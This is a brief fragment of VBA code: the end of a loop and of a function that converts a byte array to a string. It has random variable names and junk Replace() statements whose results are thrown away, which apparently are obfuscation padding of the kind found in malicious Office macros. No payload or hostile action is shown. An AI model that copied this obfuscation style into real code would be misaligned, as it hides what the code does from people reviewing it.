        WaKr = WaKr + 1
        CmHWM = Replace("HUqyzhlKIJ", "HUq", "EbecS")
        CmHWM = Replace("iahoZSlEWE", "iah", "FqFgH")
    Wend
    lwdPKrR = StrConv(FbyM, vbUnicode)
End Function